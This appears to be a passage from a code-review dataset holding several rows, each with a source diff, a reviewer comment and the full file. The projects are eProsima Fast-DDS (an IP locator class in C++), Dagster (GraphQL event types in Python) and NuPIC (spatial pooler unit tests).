locator.address[6] == 0 &&
locator.address[7] == 0 &&
locator.address[8] == 0 &&
locator.address[9] == 0 &&
locator.address[10] == 0 &&
locator.address[11] == 0 &&
locator.address[12] == 0 &&
locator.address[13] == 0 &&
locator.address[14] == 0 &&
locator.address[15] == 0;
}
}
bool IPLocator::compareAddress(
const Locator_t& loc1,
const Locator_t& loc2,
bool fullAddress)
{
if (loc1.kind != loc2.kind)
{
return false;
}
if (!fullAddress && (loc1.kind == LOCATOR_KIND_UDPv4 || loc1.kind == LOCATOR_KIND_TCPv4) )
{
return memcmp(&loc1.address[12], &loc2.address[12], 4) == 0;
}
else
{
return memcmp(loc1.address, loc2.address, 16) == 0;
}
}
bool IPLocator::compareAddressAndPhysicalPort(
const Locator_t& loc1,
const Locator_t& loc2)
{
return compareAddress(loc1, loc2, true) && getPhysicalPort(loc1) == getPhysicalPort(loc2);
}
std::string IPLocator::to_string(
const Locator_t& loc)
{
std::stringstream ss;
if (loc.kind == LOCATOR_KIND_UDPv4 || loc.kind == LOCATOR_KIND_TCPv4)
{
ss << (int)loc.address[8] << "."
<< (int)loc.address[9] << "."
<< (int)loc.address[10] << "."
<< (int)loc.address[11] << "@";
ss << (int)loc.address[12] << "." << (int)loc.address[13]
<< "." << (int)loc.address[14] << "." << (int)loc.address[15]
<< ":" << loc.port;
}
else if (loc.kind == LOCATOR_KIND_UDPv6 || loc.kind == LOCATOR_KIND_TCPv6)
{
for (uint8_t i = 0; i < 16; ++i)
{
ss << (int)loc.address[i];
if (i < 15)
{
ss << ".";
}
}
ss << ":" << loc.port;
}
return ss.str();
}
// UDP
bool IPLocator::isMulticast(
const Locator_t& locator)
{
if (locator.kind == LOCATOR_KIND_TCPv4
|| locator.kind == LOCATOR_KIND_TCPv6)
{
return false;
}
if (locator.kind == LOCATOR_KIND_UDPv4)
{
return locator.address[12] >= 224 &&
locator.address[12] <= 239;
}
else
{
return locator.address[0] == 0xFF;
}
}
} // namespace rtps
} // namespace fastrtps
} // namespace eprosima
| 1 | 20,604 | If we want to avoid the user calling constructor and destructor, we should add `= delete` to their declarations. If we just want to avoid writing the default behavior, we should add `= default` to the declarations. I'm more in favor of the second option to avoid an API break. | eProsima-Fast-DDS | cpp |
@@ -269,12 +269,12 @@ class GrapheneObjectStoreOperationResult(graphene.ObjectType):
return _to_metadata_entries(self.metadata_entries) # pylint: disable=no-member
-class GrapheneMaterialization(graphene.ObjectType):
+class GrapheneMaterializationOrObservation(graphene.ObjectType):
assetKey = graphene.Field(GrapheneAssetKey)
class Meta:
interfaces = (GrapheneDisplayableEvent,)
- name = "Materialization"
+ name = "MaterializationOrObservation"
def resolve_metadataEntries(self, _graphene_info):
from ...implementation.events import _to_metadata_entries | 1 | import graphene
from dagster import check
from dagster.core.events import AssetLineageInfo, DagsterEventType
from dagster.core.execution.plan.objects import ErrorSource
from dagster.core.execution.stats import RunStepKeyStatsSnapshot
from ...implementation.fetch_runs import get_step_stats
from ..asset_key import GrapheneAssetKey, GrapheneAssetLineageInfo
from ..errors import GraphenePythonError
from ..runs import GrapheneStepEventStatus
from ..util import non_null_list
from .log_level import GrapheneLogLevel
class GrapheneMessageEvent(graphene.Interface):
runId = graphene.NonNull(graphene.String)
message = graphene.NonNull(graphene.String)
timestamp = graphene.NonNull(graphene.String)
level = graphene.NonNull(GrapheneLogLevel)
stepKey = graphene.Field(graphene.String)
solidHandleID = graphene.Field(graphene.String)
eventType = graphene.Field(graphene.Enum.from_enum(DagsterEventType))
class Meta:
name = "MessageEvent"
class GrapheneEventMetadataEntry(graphene.Interface):
label = graphene.NonNull(graphene.String)
description = graphene.String()
class Meta:
name = "EventMetadataEntry"
class GrapheneDisplayableEvent(graphene.Interface):
label = graphene.NonNull(graphene.String)
description = graphene.String()
metadataEntries = non_null_list(GrapheneEventMetadataEntry)
class Meta:
name = "DisplayableEvent"
class GrapheneMissingRunIdErrorEvent(graphene.ObjectType):
invalidRunId = graphene.NonNull(graphene.String)
class Meta:
name = "MissingRunIdErrorEvent"
class GrapheneLogMessageEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent,)
name = "LogMessageEvent"
class GrapheneRunEvent(graphene.Interface):
pipelineName = graphene.NonNull(graphene.String)
class Meta:
name = "RunEvent"
class GrapheneRunEnqueuedEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneRunEvent)
name = "RunEnqueuedEvent"
class GrapheneRunDequeuedEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneRunEvent)
name = "RunDequeuedEvent"
class GrapheneRunStartingEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneRunEvent)
name = "RunStartingEvent"
class GrapheneRunCancelingEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneRunEvent)
name = "RunCancelingEvent"
class GrapheneRunCanceledEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneRunEvent)
name = "RunCanceledEvent"
class GrapheneRunStartEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneRunEvent)
name = "RunStartEvent"
class GrapheneRunSuccessEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneRunEvent)
name = "RunSuccessEvent"
class GrapheneRunFailureEvent(graphene.ObjectType):
error = graphene.Field(GraphenePythonError)
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneRunEvent)
name = "RunFailureEvent"
class GrapheneAlertStartEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneRunEvent)
name = "AlertStartEvent"
class GrapheneAlertSuccessEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneRunEvent)
name = "AlertSuccessEvent"
class GrapheneStepEvent(graphene.Interface):
stepKey = graphene.Field(graphene.String)
solidHandleID = graphene.Field(graphene.String)
class Meta:
name = "StepEvent"
class GrapheneExecutionStepStartEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneStepEvent)
name = "ExecutionStepStartEvent"
class GrapheneExecutionStepRestartEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneStepEvent)
name = "ExecutionStepRestartEvent"
class GrapheneExecutionStepUpForRetryEvent(graphene.ObjectType):
error = graphene.Field(GraphenePythonError)
secondsToWait = graphene.Field(graphene.Int)
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneStepEvent)
name = "ExecutionStepUpForRetryEvent"
class GrapheneExecutionStepSkippedEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneStepEvent)
name = "ExecutionStepSkippedEvent"
class GrapheneEventPathMetadataEntry(graphene.ObjectType):
path = graphene.NonNull(graphene.String)
class Meta:
interfaces = (GrapheneEventMetadataEntry,)
name = "EventPathMetadataEntry"
class GrapheneEventJsonMetadataEntry(graphene.ObjectType):
jsonString = graphene.NonNull(graphene.String)
class Meta:
interfaces = (GrapheneEventMetadataEntry,)
name = "EventJsonMetadataEntry"
class GrapheneEventTextMetadataEntry(graphene.ObjectType):
text = graphene.NonNull(graphene.String)
class Meta:
interfaces = (GrapheneEventMetadataEntry,)
name = "EventTextMetadataEntry"
class GrapheneEventUrlMetadataEntry(graphene.ObjectType):
url = graphene.NonNull(graphene.String)
class Meta:
interfaces = (GrapheneEventMetadataEntry,)
name = "EventUrlMetadataEntry"
class GrapheneEventMarkdownMetadataEntry(graphene.ObjectType):
md_str = graphene.NonNull(graphene.String)
class Meta:
interfaces = (GrapheneEventMetadataEntry,)
name = "EventMarkdownMetadataEntry"
class GrapheneEventPythonArtifactMetadataEntry(graphene.ObjectType):
module = graphene.NonNull(graphene.String)
name = graphene.NonNull(graphene.String)
class Meta:
interfaces = (GrapheneEventMetadataEntry,)
name = "EventPythonArtifactMetadataEntry"
class GrapheneEventFloatMetadataEntry(graphene.ObjectType):
floatValue = graphene.Field(graphene.Float)
class Meta:
interfaces = (GrapheneEventMetadataEntry,)
name = "EventFloatMetadataEntry"
class GrapheneEventIntMetadataEntry(graphene.ObjectType):
intValue = graphene.Field(
graphene.Int, description="Nullable to allow graceful degrade on > 32 bit numbers"
)
intRepr = graphene.NonNull(
graphene.String,
description="String representation of the int to support greater than 32 bit",
)
class Meta:
interfaces = (GrapheneEventMetadataEntry,)
name = "EventIntMetadataEntry"
class GrapheneEventPipelineRunMetadataEntry(graphene.ObjectType):
runId = graphene.NonNull(graphene.String)
class Meta:
interfaces = (GrapheneEventMetadataEntry,)
name = "EventPipelineRunMetadataEntry"
class GrapheneEventAssetMetadataEntry(graphene.ObjectType):
assetKey = graphene.NonNull(GrapheneAssetKey)
class Meta:
interfaces = (GrapheneEventMetadataEntry,)
name = "EventAssetMetadataEntry"
class GrapheneObjectStoreOperationType(graphene.Enum):
SET_OBJECT = "SET_OBJECT"
GET_OBJECT = "GET_OBJECT"
RM_OBJECT = "RM_OBJECT"
CP_OBJECT = "CP_OBJECT"
class Meta:
name = "ObjectStoreOperationType"
class GrapheneObjectStoreOperationResult(graphene.ObjectType):
op = graphene.NonNull(GrapheneObjectStoreOperationType)
class Meta:
interfaces = (GrapheneDisplayableEvent,)
name = "ObjectStoreOperationResult"
def resolve_metadataEntries(self, _graphene_info):
from ...implementation.events import _to_metadata_entries
return _to_metadata_entries(self.metadata_entries) # pylint: disable=no-member
class GrapheneMaterialization(graphene.ObjectType):
assetKey = graphene.Field(GrapheneAssetKey)
class Meta:
interfaces = (GrapheneDisplayableEvent,)
name = "Materialization"
def resolve_metadataEntries(self, _graphene_info):
from ...implementation.events import _to_metadata_entries
return _to_metadata_entries(self.metadata_entries) # pylint: disable=no-member
def resolve_assetKey(self, _graphene_info):
asset_key = self.asset_key # pylint: disable=no-member
if not asset_key:
return None
return GrapheneAssetKey(path=asset_key.path)
class GrapheneExpectationResult(graphene.ObjectType):
success = graphene.NonNull(graphene.Boolean)
class Meta:
interfaces = (GrapheneDisplayableEvent,)
name = "ExpectationResult"
def resolve_metadataEntries(self, _graphene_info):
from ...implementation.events import _to_metadata_entries
return _to_metadata_entries(self.metadata_entries) # pylint: disable=no-member
class GrapheneTypeCheck(graphene.ObjectType):
success = graphene.NonNull(graphene.Boolean)
class Meta:
interfaces = (GrapheneDisplayableEvent,)
name = "TypeCheck"
def resolve_metadataEntries(self, _graphene_info):
from ...implementation.events import _to_metadata_entries
return _to_metadata_entries(self.metadata_entries) # pylint: disable=no-member
class GrapheneFailureMetadata(graphene.ObjectType):
class Meta:
interfaces = (GrapheneDisplayableEvent,)
name = "FailureMetadata"
def resolve_metadataEntries(self, _graphene_info):
from ...implementation.events import _to_metadata_entries
return _to_metadata_entries(self.metadata_entries) # pylint: disable=no-member
class GrapheneExecutionStepInputEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneStepEvent)
name = "ExecutionStepInputEvent"
input_name = graphene.NonNull(graphene.String)
type_check = graphene.NonNull(GrapheneTypeCheck)
class GrapheneExecutionStepOutputEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneStepEvent, GrapheneDisplayableEvent)
name = "ExecutionStepOutputEvent"
output_name = graphene.NonNull(graphene.String)
type_check = graphene.NonNull(GrapheneTypeCheck)
class GrapheneExecutionStepSuccessEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneStepEvent)
name = "ExecutionStepSuccessEvent"
class GrapheneExecutionStepFailureEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneStepEvent)
name = "ExecutionStepFailureEvent"
error = graphene.Field(GraphenePythonError)
errorSource = graphene.Field(graphene.Enum.from_enum(ErrorSource))
failureMetadata = graphene.Field(GrapheneFailureMetadata)
class GrapheneHookCompletedEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneStepEvent)
name = "HookCompletedEvent"
class GrapheneHookSkippedEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneStepEvent)
name = "HookSkippedEvent"
class GrapheneHookErroredEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneStepEvent)
name = "HookErroredEvent"
error = graphene.Field(GraphenePythonError)
class GrapheneLogsCapturedEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent,)
name = "LogsCapturedEvent"
logKey = graphene.NonNull(graphene.String)
stepKeys = graphene.List(graphene.NonNull(graphene.String))
pid = graphene.Int()
class GrapheneStepMaterializationEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneStepEvent)
name = "StepMaterializationEvent"
materialization = graphene.NonNull(GrapheneMaterialization)
stepStats = graphene.NonNull(lambda: GrapheneRunStepStats)
assetLineage = non_null_list(GrapheneAssetLineageInfo)
def __init__(self, materialization, assetLineage, **basic_params):
self._asset_lineage = check.opt_list_param(assetLineage, "assetLineage", AssetLineageInfo)
super().__init__(materialization=materialization, **basic_params)
def resolve_stepStats(self, graphene_info):
run_id = self.runId # pylint: disable=no-member
step_key = self.stepKey # pylint: disable=no-member
stats = get_step_stats(graphene_info, run_id, step_keys=[step_key])
return stats[0]
def resolve_assetLineage(self, _graphene_info):
return [
GrapheneAssetLineageInfo(
assetKey=lineage_info.asset_key,
partitions=lineage_info.partitions,
)
for lineage_info in self._asset_lineage
]
class GrapheneHandledOutputEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneStepEvent, GrapheneDisplayableEvent)
name = "HandledOutputEvent"
output_name = graphene.NonNull(graphene.String)
manager_key = graphene.NonNull(graphene.String)
class GrapheneLoadedInputEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneStepEvent)
name = "LoadedInputEvent"
input_name = graphene.NonNull(graphene.String)
manager_key = graphene.NonNull(graphene.String)
upstream_output_name = graphene.Field(graphene.String)
upstream_step_key = graphene.Field(graphene.String)
class GrapheneObjectStoreOperationEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneStepEvent)
name = "ObjectStoreOperationEvent"
operation_result = graphene.NonNull(GrapheneObjectStoreOperationResult)
class GrapheneEngineEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneDisplayableEvent, GrapheneStepEvent)
name = "EngineEvent"
error = graphene.Field(GraphenePythonError)
marker_start = graphene.Field(graphene.String)
marker_end = graphene.Field(graphene.String)
class GrapheneStepExpectationResultEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneStepEvent)
name = "StepExpectationResultEvent"
expectation_result = graphene.NonNull(GrapheneExpectationResult)
# Should be a union of all possible events
class GrapheneDagsterRunEvent(graphene.Union):
class Meta:
types = (
GrapheneExecutionStepFailureEvent,
GrapheneExecutionStepInputEvent,
GrapheneExecutionStepOutputEvent,
GrapheneExecutionStepSkippedEvent,
GrapheneExecutionStepStartEvent,
GrapheneExecutionStepSuccessEvent,
GrapheneExecutionStepUpForRetryEvent,
GrapheneExecutionStepRestartEvent,
GrapheneLogMessageEvent,
GrapheneRunFailureEvent,
GrapheneRunStartEvent,
GrapheneRunEnqueuedEvent,
GrapheneRunDequeuedEvent,
GrapheneRunStartingEvent,
GrapheneRunCancelingEvent,
GrapheneRunCanceledEvent,
GrapheneRunSuccessEvent,
GrapheneHandledOutputEvent,
GrapheneLoadedInputEvent,
GrapheneLogsCapturedEvent,
GrapheneObjectStoreOperationEvent,
GrapheneStepExpectationResultEvent,
GrapheneStepMaterializationEvent,
GrapheneEngineEvent,
GrapheneHookCompletedEvent,
GrapheneHookSkippedEvent,
GrapheneHookErroredEvent,
GrapheneAlertStartEvent,
GrapheneAlertSuccessEvent,
)
name = "DagsterRunEvent"
class GraphenePipelineRunStepStats(graphene.Interface):
runId = graphene.NonNull(graphene.String)
stepKey = graphene.NonNull(graphene.String)
status = graphene.Field(GrapheneStepEventStatus)
startTime = graphene.Field(graphene.Float)
endTime = graphene.Field(graphene.Float)
materializations = non_null_list(GrapheneMaterialization)
expectationResults = non_null_list(GrapheneExpectationResult)
class Meta:
name = "PipelineRunStepStats"
class GrapheneRunMarker(graphene.ObjectType):
startTime = graphene.Field(graphene.Float)
endTime = graphene.Field(graphene.Float)
class Meta:
name = "RunMarker"
class GrapheneRunStepStats(graphene.ObjectType):
runId = graphene.NonNull(graphene.String)
stepKey = graphene.NonNull(graphene.String)
status = graphene.Field(GrapheneStepEventStatus)
startTime = graphene.Field(graphene.Float)
endTime = graphene.Field(graphene.Float)
materializations = non_null_list(GrapheneMaterialization)
expectationResults = non_null_list(GrapheneExpectationResult)
attempts = non_null_list(GrapheneRunMarker)
markers = non_null_list(GrapheneRunMarker)
class Meta:
interfaces = (GraphenePipelineRunStepStats,)
name = "RunStepStats"
def __init__(self, stats):
self._stats = check.inst_param(stats, "stats", RunStepKeyStatsSnapshot)
super().__init__(
runId=stats.run_id,
stepKey=stats.step_key,
status=stats.status,
startTime=stats.start_time,
endTime=stats.end_time,
materializations=stats.materializations,
expectationResults=stats.expectation_results,
attempts=[
GrapheneRunMarker(startTime=attempt.start_time, endTime=attempt.end_time)
for attempt in stats.attempts_list
],
markers=[
GrapheneRunMarker(startTime=marker.start_time, endTime=marker.end_time)
for marker in stats.markers
],
)
| 1 | 18,601 | My preference here is to keep a stricter hierarchy. We should have a mixin or something that is an AssetEvent that Observation and Materialization can both inherit from. That way we can check the type in the frontend if we need to. | dagster-io-dagster | py |
@@ -212,7 +212,7 @@ class SpatialPoolerTest(unittest.TestCase):
# Get only the active column indices
spOutput = [i for i, v in enumerate(activeArray) if v != 0]
- self.assertEqual(spOutput, expectedOutput)
+ self.assertEqual(sorted(spOutput), expectedOutput)
def testStripNeverLearned(self): | 1 | #! /usr/bin/env python
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
# Disable since test code accesses private members in the class to be tested
# pylint: disable=W0212
import numbers
import tempfile
import unittest
from copy import copy
from mock import Mock
import numpy
from nupic.support.unittesthelpers.algorithm_test_helpers import (
getNumpyRandomGenerator, getSeed)
from nupic.bindings.math import GetNTAReal, Random
from nupic.research.spatial_pooler import (BinaryCorticalColumns,
CorticalColumns,
SpatialPooler)
try:
import capnp
except ImportError:
capnp = None
if capnp:
from nupic.proto import SpatialPoolerProto_capnp
uintDType = "uint32"
realDType = GetNTAReal()
class SpatialPoolerTest(unittest.TestCase):
"""Unit Tests for SpatialPooler class."""
def setUp(self):
self._params = {
"inputDimensions": [5],
"columnDimensions": [5],
"potentialRadius": 5,
"potentialPct": 0.5,
"globalInhibition": False,
"localAreaDensity": -1.0,
"numActiveColumnsPerInhArea": 3,
"stimulusThreshold": 0,
"synPermInactiveDec": 0.01,
"synPermActiveInc": 0.1,
"synPermConnected": 0.10,
"minPctOverlapDutyCycle": 0.1,
"minPctActiveDutyCycle": 0.1,
"dutyCyclePeriod": 10,
"maxBoost": 10.0,
"seed": getSeed(),
"spVerbosity": 0
}
self._sp = SpatialPooler(**self._params)
def testCompute1(self):
"""Checks that feeding in the same input vector leads to polarized
permanence values: either zeros or ones, but no fractions"""
sp = SpatialPooler(
inputDimensions=[9],
columnDimensions=[5],
potentialRadius=3,
potentialPct=0.5,
globalInhibition=False,
localAreaDensity=-1.0,
numActiveColumnsPerInhArea=3,
stimulusThreshold=1,
synPermInactiveDec=0.1,
synPermActiveInc=0.1,
synPermConnected=0.10,
minPctOverlapDutyCycle=0.1,
minPctActiveDutyCycle=0.1,
dutyCyclePeriod=10,
maxBoost=10.0,
seed=getSeed(),
spVerbosity=0)
sp._potentialPools = BinaryCorticalColumns(numpy.ones([sp._numColumns,
sp._numInputs]))
sp._inhibitColumns = Mock(return_value = numpy.array(range(5)))
inputVector = numpy.array([1, 0, 1, 0, 1, 0, 0, 1, 1])
activeArray = numpy.zeros(5)
for i in xrange(20):
sp.compute(inputVector, True, activeArray)
for i in xrange(sp._numColumns):
perm = sp._permanences.getRow(i)
self.assertEqual(list(perm), list(inputVector))
def testCompute2(self):
"""Checks that columns only change the permanence values for
inputs that are within their potential pool"""
sp = SpatialPooler(
inputDimensions=[10],
columnDimensions=[5],
potentialRadius=3,
potentialPct=0.5,
globalInhibition=False,
localAreaDensity=-1.0,
numActiveColumnsPerInhArea=3,
stimulusThreshold=1,
synPermInactiveDec=0.01,
synPermActiveInc=0.1,
synPermConnected=0.10,
minPctOverlapDutyCycle=0.1,
minPctActiveDutyCycle=0.1,
dutyCyclePeriod=10,
maxBoost=10.0,
seed=getSeed(),
spVerbosity=0)
sp._inhibitColumns = Mock(return_value = numpy.array(range(5)))
inputVector = numpy.ones(sp._numInputs)
activeArray = numpy.zeros(5)
for i in xrange(20):
sp.compute(inputVector, True, activeArray)
for columnIndex in xrange(sp._numColumns):
potential = sp._potentialPools[columnIndex]
perm = sp._permanences.getRow(columnIndex)
self.assertEqual(list(perm), list(potential))
def testExactOutput(self):
"""
Given a specific input and initialization params the SP should return this
exact output.
Previously output varied between platforms (OSX/Linux etc)
"""
expectedOutput = [57, 80, 135, 215, 280, 281, 350, 431, 534, 556, 565, 574,
595, 663, 759, 777, 823, 932, 933, 968, 983, 1031, 1126,
1184, 1232, 1262, 1420, 1468, 1479, 1516, 1531, 1585,
1655, 1672, 1755, 1906, 1927, 1936, 1939, 1940]
sp = SpatialPooler(
inputDimensions = [1,188],
columnDimensions = [2048, 1],
potentialRadius = 94,
potentialPct = 0.5,
globalInhibition = 1,
localAreaDensity = -1.0,
numActiveColumnsPerInhArea = 40.0,
stimulusThreshold = 0,
synPermInactiveDec = 0.01,
synPermActiveInc = 0.1,
synPermConnected = 0.1,
minPctOverlapDutyCycle=0.001,
minPctActiveDutyCycle=0.001,
dutyCyclePeriod = 1000,
maxBoost = 10.0,
seed = 1956,
spVerbosity = 0
)
inputVector = [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
inputArray = numpy.array(inputVector).astype(realDType)
activeArray = numpy.zeros(2048)
sp.compute(inputArray, 1, activeArray)
# Get only the active column indices
spOutput = [i for i, v in enumerate(activeArray) if v != 0]
self.assertEqual(spOutput, expectedOutput)
def testStripNeverLearned(self):
sp = self._sp
sp._activeDutyCycles = numpy.array([0.5, 0.1, 0, 0.2, 0.4, 0])
activeArray = numpy.array([1, 1, 1, 0, 1, 0])
sp.stripUnlearnedColumns(activeArray)
stripped = numpy.where(activeArray == 1)[0]
trueStripped = [0, 1, 4]
self.assertListEqual(trueStripped, list(stripped))
sp._activeDutyCycles = numpy.array([0.9, 0, 0, 0, 0.4, 0.3])
activeArray = numpy.ones(6)
sp.stripUnlearnedColumns(activeArray)
stripped = numpy.where(activeArray == 1)[0]
trueStripped = [0, 4, 5]
self.assertListEqual(trueStripped, list(stripped))
sp._activeDutyCycles = numpy.array([0, 0, 0, 0, 0, 0])
activeArray = numpy.ones(6)
sp.stripUnlearnedColumns(activeArray)
stripped = numpy.where(activeArray == 1)[0]
trueStripped = []
self.assertListEqual(trueStripped, list(stripped))
sp._activeDutyCycles = numpy.ones(6)
activeArray = numpy.ones(6)
sp.stripUnlearnedColumns(activeArray)
stripped = numpy.where(activeArray == 1)[0]
trueStripped = range(6)
self.assertListEqual(trueStripped, list(stripped))
def testMapColumn(self):
params = self._params.copy()
# Test 1D
params.update({
"columnDimensions": [4],
"inputDimensions": [12]
})
sp = SpatialPooler(**params)
self.assertEqual(sp._mapColumn(0), 1)
self.assertEqual(sp._mapColumn(1), 4)
self.assertEqual(sp._mapColumn(2), 7)
self.assertEqual(sp._mapColumn(3), 10)
# Test 1D with same dimensions of columns and inputs
params.update({
"columnDimensions": [4],
"inputDimensions": [4]
})
sp = SpatialPooler(**params)
self.assertEqual(sp._mapColumn(0), 0)
self.assertEqual(sp._mapColumn(1), 1)
self.assertEqual(sp._mapColumn(2), 2)
self.assertEqual(sp._mapColumn(3), 3)
# Test 1D with dimensions of length 1
params.update({
"columnDimensions": [1],
"inputDimensions": [1]
})
sp = SpatialPooler(**params)
self.assertEqual(sp._mapColumn(0), 0)
# Test 2D
params.update({
"columnDimensions": [12, 4],
"inputDimensions": [36, 12]
})
sp = SpatialPooler(**params)
self.assertEqual(sp._mapColumn(0), 13)
self.assertEqual(sp._mapColumn(4), 49)
self.assertEqual(sp._mapColumn(5), 52)
self.assertEqual(sp._mapColumn(7), 58)
self.assertEqual(sp._mapColumn(47), 418)
def testMapPotential1D(self):
params = self._params.copy()
params.update({
"inputDimensions": [12],
"columnDimensions": [4],
"potentialRadius": 2
})
# Test without wrapAround and potentialPct = 1
params["potentialPct"] = 1
sp = SpatialPooler(**params)
expectedMask = [1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0]
mask = sp._mapPotential(0, wrapAround=False)
self.assertListEqual(mask.tolist(), expectedMask)
expectedMask = [0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0]
mask = sp._mapPotential(2, wrapAround=False)
self.assertListEqual(mask.tolist(), expectedMask)
# Test with wrapAround and potentialPct = 1
params["potentialPct"] = 1
sp = SpatialPooler(**params)
expectedMask = [1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1]
mask = sp._mapPotential(0, wrapAround=True)
self.assertListEqual(mask.tolist(), expectedMask)
expectedMask = [1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1]
mask = sp._mapPotential(3, wrapAround=True)
self.assertListEqual(mask.tolist(), expectedMask)
# Test with potentialPct < 1
params["potentialPct"] = 0.5
sp = SpatialPooler(**params)
supersetMask = numpy.array([1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1])
mask = sp._mapPotential(0, wrapAround=True)
self.assertEqual(numpy.sum(mask), 3)
unionMask = supersetMask | mask.astype(int)
self.assertListEqual(unionMask.tolist(), supersetMask.tolist())
def testMapPotential2D(self):
params = self._params.copy()
params.update({
"columnDimensions": [2, 4],
"inputDimensions": [6, 12],
"potentialRadius": 1,
"potentialPct": 1
})
# Test without wrapAround
sp = SpatialPooler(**params)
trueIndicies = [0, 12, 24,
1, 13, 25,
2, 14, 26]
mask = sp._mapPotential(0, wrapAround=False)
self.assertSetEqual(set(numpy.flatnonzero(mask).tolist()), set(trueIndicies))
trueIndicies = [6, 18, 30,
7, 19, 31,
8, 20, 32]
mask = sp._mapPotential(2, wrapAround=False)
self.assertSetEqual(set(numpy.flatnonzero(mask).tolist()), set(trueIndicies))
# Test with wrapAround
params.update({
"potentialRadius": 2,
})
sp = SpatialPooler(**params)
trueIndicies = [71, 11, 23, 35, 47,
60, 0, 12, 24, 36,
61, 1, 13, 25, 37,
62, 2, 14, 26, 38,
63, 3, 15, 27, 39]
mask = sp._mapPotential(0, wrapAround=True)
self.assertSetEqual(set(numpy.flatnonzero(mask).tolist()), set(trueIndicies))
trueIndicies = [68, 8, 20, 32, 44,
69, 9, 21, 33, 45,
70, 10, 22, 34, 46,
71, 11, 23, 35, 47,
60, 0, 12, 24, 36]
mask = sp._mapPotential(3, wrapAround=True)
self.assertSetEqual(set(numpy.flatnonzero(mask).tolist()), set(trueIndicies))
def testMapPotential1Column1Input(self):
params = self._params.copy()
params.update({
"inputDimensions": [1],
"columnDimensions": [1],
"potentialRadius": 2
})
